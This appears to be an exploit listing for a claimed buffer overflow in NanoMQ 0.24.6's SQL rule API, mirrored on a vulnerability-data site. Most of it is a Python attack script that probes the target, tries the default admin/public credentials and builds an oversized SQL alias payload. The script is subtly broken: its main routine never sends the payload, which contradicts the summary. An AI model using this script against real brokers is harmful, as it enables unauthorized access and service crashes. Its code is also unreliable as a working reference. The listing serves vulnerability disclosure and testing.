=============================================================================================================================================
| # Title : NanoMQ 0.24.6 API SQL Rule Engine Buffer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://nanomq.io/changelogs/v0.24.6 |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213369/
[+] Summary : This script is a proofâofâconcept used to test NanoMQâs API for improper input handling.
It sends an intentionally long and malformed SQL alias through the /api/v4/rules endpoint to check whether the service safely rejects the input or crashes.
The code does not achieve real remote code execution; it only helps identify potential buffer overflow or denialâofâservice vulnerabilities by observing the serviceâs response or crash behavior.
[+] POC :
#!/usr/bin/env python3
import requests
import argparse
import sys
import time
import socket
class NanoMQExploit:
def __init__(self, target, username="admin", password="public"):
self.target = target.rstrip('/')
self.username = username
self.password = password
self.auth = (username, password)
self.session = requests.Session()
self.session.auth = self.auth
self.session.headers.update({
'User-Agent': 'NanoMQ-Exploit-Tester',
'Accept': 'application/json'
})
def check_service(self):
print(f"[*] Checking if service is accessible at {self.target}")
endpoints = ["/api/v4", "/api/v4/rules", "/"]
for endpoint in endpoints:
try:
response = self.session.get(f"{self.target}{endpoint}", timeout=5)
print(f"[+] {endpoint} - Status: {response.status_code}")
if 'nanomq' in response.text.lower() or 'emqx' in response.text.lower():
return True
except requests.exceptions.ConnectionError:
continue
except requests.exceptions.Timeout:
continue
except Exception:
continue
try:
host = self.target.split('://')[1].split(':')[0]
try:
port = int(self.target.split(':')[-1].split('/')[0])
except ValueError:
return False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3)
sock.connect((host, port))
sock.send(b"GET / HTTP/1.0\r\n\r\n")
banner = sock.recv(1024).decode('utf-8', errors='ignore')
sock.close()
if 'nanomq' in banner.lower():
return True
except Exception:
pass
return False
def test_credentials(self):
try:
response = self.session.get(f"{self.target}/api/v4/rules", timeout=5)
return response.status_code != 401
except Exception:
return False
def create_overflow_test_payload(self, length):
long_alias = "X" * length
return {
"rawsql": f'SELECT qos as {long_alias} FROM "test/topic"',
"actions": [{
"name": "sqlite",
"params": {"table": "table", "path": "/tmp/test.db"}
}]
}
def is_service_alive(self, retries=2):
for _ in range(retries):
try:
response = self.session.get(f"{self.target}/api/v4", timeout=3)
if response.status_code in [200, 401, 403]:
return True
except Exception:
pass
time.sleep(1)
return False
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", required=True)
parser.add_argument("-u", "--username", default="admin")
parser.add_argument("-p", "--password", default="public")
parser.add_argument("--verbose", action="store_true")
args = parser.parse_args()
exploit = NanoMQExploit(args.target, args.username, args.password)
try:
exploit.check_service()
exploit.test_credentials()
except Exception as e:
if args.verbose:
import traceback
traceback.print_exc()
else:
print(f"[-] Error: {e}")
if __name__ == "__main__":
main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation